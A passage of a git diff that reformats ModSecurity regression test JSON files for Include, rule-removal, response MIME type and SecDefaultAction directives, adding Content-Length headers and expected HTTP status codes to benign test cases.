{ + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"Executing operator \"Contains\" with param \"test\" against ARGS." + "expected": { + "debug_log": "Executing operator \"Contains\" with param \"test\" against ARGS.", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule ARGS \"@contains test\" \"id:9,pass,t:trim\"", "Include test-cases/data/config_example2.txt" ] }, { - "enabled":1, - "version_min":300000, - "title":"Include (5/8)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "enabled": 1, + "version_min": 300000, + "title": "Include (5/8)", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0" }, - "uri":"/?key=value&key=other_value", - "method":"GET" - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"Executing operator \"Contains\" with param \"config_example2\" against ARGS." + "expected": { + "debug_log": "Executing operator \"Contains\" with param \"config_example2\" against ARGS.", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule ARGS \"@contains test\" \"id:1,pass,t:trim\"", "Include test-cases/data/config_example.txt", @@ -201,120 +231,138 @@ ] }, { - "enabled":1, - "version_min":300000, - "title":"Include (6/8)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "enabled": 1, + "version_min": 300000, + "title": "Include (6/8)", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0" }, - "uri":"/?key=value&key=other_value", - "method":"GET" - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"Executing operator \"Contains\" with param \"test\" against ARGS." + "expected": { + "debug_log": "Executing operator \"Contains\" with param \"test\" against ARGS.", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "Include test-cases/data/config_example2.txt", "SecRule ARGS \"@contains test\" \"id:9,pass,t:trim\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Include (7/8)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "enabled": 1, + "version_min": 300000, + "title": "Include (7/8)", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0" }, - "uri":"/?key=value&key=other_value", - "method":"GET" - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "parser_error":"Looking at: 'test-cases/data/conasdffig_example2.txt'" + "expected": { + "http_code": 200, + "parser_error": "Looking at: 'test-cases/data/conasdffig_example2.txt'" }, - "rules":[ + "rules": [ "SecRuleEngine On", "Include test-cases/data/conasdffig_example2.txt", "SecRule ARGS \"@contains test\" \"id:9,pass,t:trim\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Include (8/8) -- quoted with wildcard", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "enabled": 1, + "version_min": 300000, + "title": "Include (8/8) -- quoted with wildcard", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0" }, - "uri":"/?key=value&key=other_value", - "method":"GET" - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"Executing operator \"Contains\" with param \"config_example2\" against ARGS." + "expected": { + "debug_log": "Executing operator \"Contains\" with param \"config_example2\" against ARGS.", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "Include \"test-cases/data/config_ex*ple2.txt\"", "SecRule ARGS \"@contains test\" \"id:9,pass,t:trim\"" diff --git a/test/test-cases/regression/config-remove_by_id.json b/test/test-cases/regression/config-remove_by_id.json index 9f074420b8..4dd07b85ec 100644 --- a/test/test-cases/regression/config-remove_by_id.json +++ b/test/test-cases/regression/config-remove_by_id.json @@ -1,39 +1,45 @@ [ { - "enabled":1, - "version_min":300000, - "title":"SecRuleRemoveById (1/3)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "SecRuleRemoveById (1/3)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0" }, - "uri":"/?key=value&key=other_value", - "method":"GET" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"Skipped rule id '2'. Removed by an SecRuleRemove directive." + "expected": { + "debug_log": "Skipped rule id '2'. Removed by an SecRuleRemove directive.", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleRemoveById 2", "SecRule ARGS \"@contains test\" \"id:1,pass,t:trim\"", "SecRule ARGS \"@contains test\" \"id:2,pass,t:trim\"", @@ -41,40 +47,46 @@ ] }, { - "enabled":1, - "version_min":300000, - "title":"SecRuleRemoveById (2/3)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "SecRuleRemoveById (2/3)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0" }, - "uri":"/?key=value&key=other_value", - "method":"GET" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"Skipped rule id '2'. Removed by an SecRuleRemove directive." + "expected": { + "debug_log": "Skipped rule id '2'. Removed by an SecRuleRemove directive.", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleRemoveById 1-3", "SecRule ARGS \"@contains test\" \"id:1,pass,t:trim\"", "SecRule ARGS \"@contains test\" \"id:2,pass,t:trim\"", @@ -82,40 +94,46 @@ ] }, { - "enabled":1, - "version_min":300000, - "title":"SecRuleRemoveById (3/3)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "SecRuleRemoveById (3/3)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0" }, - "uri":"/?key=value&key=other_value", - "method":"GET" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"Skipped rule id '2'. Removed by an SecRuleRemove directive." + "expected": { + "debug_log": "Skipped rule id '2'. Removed by an SecRuleRemove directive.", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleRemoveById 1 2-3", "SecRule ARGS \"@contains test\" \"id:1,pass,t:trim\"", "SecRule ARGS \"@contains test\" \"id:2,pass,t:trim\"", diff --git a/test/test-cases/regression/config-remove_by_msg.json b/test/test-cases/regression/config-remove_by_msg.json index 36cb3cab06..dc814e6be6 100644 --- a/test/test-cases/regression/config-remove_by_msg.json +++ b/test/test-cases/regression/config-remove_by_msg.json @@ -1,39 +1,45 @@ [ { - "enabled":1, - "version_min":300000, - "title":"SecRuleRemoveByMsg (1/2)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "SecRuleRemoveByMsg (1/2)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0" }, - "uri":"/?key=value&key=other_value", - "method":"GET" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"Skipped rule id '2'. Removed by a SecRuleRemoveByMsg directive." + "expected": { + "debug_log": "Skipped rule id '2'. Removed by a SecRuleRemoveByMsg directive.", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleRemoveByMsg tag123", "SecRule ARGS \"@contains test\" \"id:1,pass,t:trim\"", "SecRule ARGS \"@contains test\" \"id:2,pass,t:trim,msg:'tag123'\"", @@ -41,40 +47,46 @@ ] }, { - "enabled":1, - "version_min":300000, - "title":"SecRuleRemoveByMsg (2/2)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "SecRuleRemoveByMsg (2/2)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0" }, - "uri":"/?key=value&key=other_value", - "method":"GET" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"Skipped rule id '3'. Removed by a SecRuleRemoveByMsg directive." + "expected": { + "debug_log": "Skipped rule id '3'. Removed by a SecRuleRemoveByMsg directive.", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleRemoveByMsg whee", "SecRule ARGS \"@contains test\" \"id:1,pass,t:trim\"", "SecRule ARGS \"@contains test\" \"id:2,pass,t:trim\"", diff --git a/test/test-cases/regression/config-remove_by_tag.json b/test/test-cases/regression/config-remove_by_tag.json index 09681546ac..3ad907b735 100644 --- a/test/test-cases/regression/config-remove_by_tag.json +++ b/test/test-cases/regression/config-remove_by_tag.json @@ -1,39 +1,45 @@ [ { - "enabled":1, - "version_min":300000, - "title":"SecRuleRemoveByTag (1/2)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "SecRuleRemoveByTag (1/2)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0" }, - "uri":"/?key=value&key=other_value", - "method":"GET" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"Skipped rule id '2'. Removed by a SecRuleRemoveByTag directive" + "expected": { + "debug_log": "Skipped rule id '2'. Removed by a SecRuleRemoveByTag directive", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleRemoveByTag tag123", "SecRule ARGS \"@contains test\" \"id:1,pass,t:trim\"", "SecRule ARGS \"@contains test\" \"id:2,pass,t:trim,tag:tag123\"", @@ -41,40 +47,46 @@ ] }, { - "enabled":1, - "version_min":300000, - "title":"SecRuleRemoveByTag (2/2)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "SecRuleRemoveByTag (2/2)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0" }, - "uri":"/?key=value&key=other_value", - "method":"GET" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"Skipped rule id '3'. Removed by a SecRuleRemoveByTag directive." + "expected": { + "debug_log": "Skipped rule id '3'. Removed by a SecRuleRemoveByTag directive.", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleRemoveByTag whee", "SecRule ARGS \"@contains test\" \"id:1,pass,t:trim\"", "SecRule ARGS \"@contains test\" \"id:2,pass,t:trim\"", diff --git a/test/test-cases/regression/config-response_type.json b/test/test-cases/regression/config-response_type.json index 621ab38a20..bcea1effe1 100644 --- a/test/test-cases/regression/config-response_type.json +++ b/test/test-cases/regression/config-response_type.json @@ -1,128 +1,144 @@ [ { - "enabled":1, - "version_min":300000, - "title":"SecResponseBodyMimeType (1/3)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "SecResponseBodyMimeType (1/3)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0" }, - "uri":"/?key=value&key=other_value", - "method":"GET" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"T \\(0\\) t:trim: \"no need.\"" + "expected": { + "debug_log": "T \\(0\\) t:trim: \"no need.\"", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecResponseBodyAccess On", - "SecResponseBodyMimeType text\/plain text\/html text\/xml", + "SecResponseBodyMimeType text/plain text/html text/xml", "SecRule RESPONSE_BODY \"@contains RESPONSE_CONTENT_TYPE\" \"id:9,pass,t:trim,phase:4\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"SecResponseBodyMimeType (2/3)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "SecResponseBodyMimeType (2/3)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0" }, - "uri":"/?key=value&key=other_value", - "method":"GET" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"Response Content-Type is text/html. It is not marked to be inspected." + "expected": { + "debug_log": "Response Content-Type is text/html. It is not marked to be inspected.", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecResponseBodyAccess On", - "SecResponseBodyMimeType application\/something", + "SecResponseBodyMimeType application/something", "SecRule RESPONSE_BODY \"@contains RESPONSE_CONTENT_TYPE\" \"id:9,pass,t:trim,phase:4\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"SecResponseBodyMimeType (3/3)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "SecResponseBodyMimeType (3/3)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0" }, - "uri":"/?key=value&key=other_value", - "method":"GET" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"Response Content-Type is text/html. It is not marked to be inspected." + "expected": { + "debug_log": "Response Content-Type is text/html. It is not marked to be inspected.", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecResponseBodyAccess On", - "SecResponseBodyMimeType text\/plain text\/tml text\/xml", + "SecResponseBodyMimeType text/plain text/tml text/xml", "SecResponseBodyMimeTypesClear", "SecRule RESPONSE_BODY \"@contains RESPONSE_CONTENT_TYPE\" \"id:9,pass,t:trim,phase:4\"" ] } - - ] diff --git a/test/test-cases/regression/config-secdefaultaction.json b/test/test-cases/regression/config-secdefaultaction.json index bb3d7d8104..9a0ef824d8 100644 --- a/test/test-cases/regression/config-secdefaultaction.json +++ b/test/test-cases/regression/config-secdefaultaction.json @@ -1,57 +1,59 @@ [ { - "enabled":1, - "version_min":300000, - "version_max":0, - "title":"Testing action :: SecDefaultAction: supporting transformation", - "client":{ - "ip":"200.249.12.31", - "port":2313 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "User-Agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept":"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", - "Accept-Language":"en-us,en;q=0.5", - "Accept-Encoding":"gzip,deflate", - "Accept-Charset":"ISO-8859-1,utf-8;q=0.7,*;q=0.7", - "Keep-Alive":"300", - "Connection":"keep-alive", - "Cookie":"PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Pragma":"no-cache", - "Cache-Control":"no-cache" + "enabled": 1, + "version_min": 300000, + "version_max": 0, + "title": "Testing action :: SecDefaultAction: supporting transformation", + "client": { + "ip": "200.249.12.31", + "port": 2313 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Accept-Language": "en-us,en;q=0.5", + "Accept-Encoding": "gzip,deflate", + "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", + "Keep-Alive": "300", + "Connection": "keep-alive", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "Pragma": "no-cache", + "Cache-Control": "no-cache", + "Content-Length": "0" }, - "uri":"\/test.pl?param1= test ¶m2=test2", - "method":"GET", - "http_version":1.1, - "body":"" - }, - "response":{ - "headers":{ - "Content-Type":"text\/xml; charset=utf-8\n\r", - "Content-Length":"length\n\r" + "uri": "/test.pl?param1= test ¶m2=test2", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "384" }, - "body":[ + "body": [ "\n\r", - "\n\r", + "\n\r", " \n\r", - " \n\r", - " string<\/EnlightenResult>\n\r", - " <\/EnlightenResponse>\n\r", - " <\/soap:Body>\n\r", - "<\/soap:Envelope>\n\r" + " \n\r", + " string\n\r", + " \n\r", + " \n\r", + "\n\r" ] }, - "expected":{ - "audit_log":"", - "debug_log":"lowercase: \"300\"", - "error_log":"" + "expected": { + "debug_log": "lowercase: \"300\"", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecDefaultAction \"phase:2,t:lowercase,pass\"", "SecRule REQUEST_HEADERS \"@contains PHPSESSID\" \"phase:2,id:1,msg:'This is a test, %{REQUEST_HEADERS:Accept}%'\"", @@ -59,58 +61,60 @@ ] }, { - "enabled":1, - "version_min":300000, - "version_max":0, - "title":"Testing action :: SecDefaultAction: supporting transformation + t:none", - "client":{ - "ip":"200.249.12.31", - "port":2313 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "User-Agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept":"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", - "Accept-Language":"en-us,en;q=0.5", - "Accept-Encoding":"gzip,deflate", - "Accept-Charset":"ISO-8859-1,utf-8;q=0.7,*;q=0.7", - "Keep-Alive":"300", - "Connection":"keep-alive", - "Cookie":"PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Pragma":"no-cache", - "Cache-Control":"no-cache" + "enabled": 1, + "version_min": 300000, + "version_max": 0, + "title": "Testing action :: SecDefaultAction: supporting transformation + t:none", + "client": { + "ip": "200.249.12.31", + "port": 2313 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Accept-Language": "en-us,en;q=0.5", + "Accept-Encoding": "gzip,deflate", + "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", + "Keep-Alive": "300", + "Connection": "keep-alive", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "Pragma": "no-cache", + "Cache-Control": "no-cache", + "Content-Length": "0" }, - "uri":"\/test.pl?param1= test ¶m2=test2", - "method":"GET", - "http_version":1.1, - "body":"" - }, - "response":{ - "headers":{ - "Content-Type":"text\/xml; charset=utf-8\n\r", - "Content-Length":"length\n\r" + "uri": "/test.pl?param1= test ¶m2=test2", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "384" }, - "body":[ + "body": [ "\n\r", - "\n\r", + "\n\r", " \n\r", - " \n\r", - " string<\/EnlightenResult>\n\r", - " <\/EnlightenResponse>\n\r", - " <\/soap:Body>\n\r", - "<\/soap:Envelope>\n\r" + " \n\r", + " string\n\r", + " \n\r", + " \n\r", + "\n\r" ] }, - "expected":{ - "audit_log":"", - "debug_log":" Target value: \"PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120\" ", - "error_log":"" + "expected": { + "debug_log": " Target value: \"PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120\" ", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecDefaultAction \"phase:2,t:lowercase,pass\"", 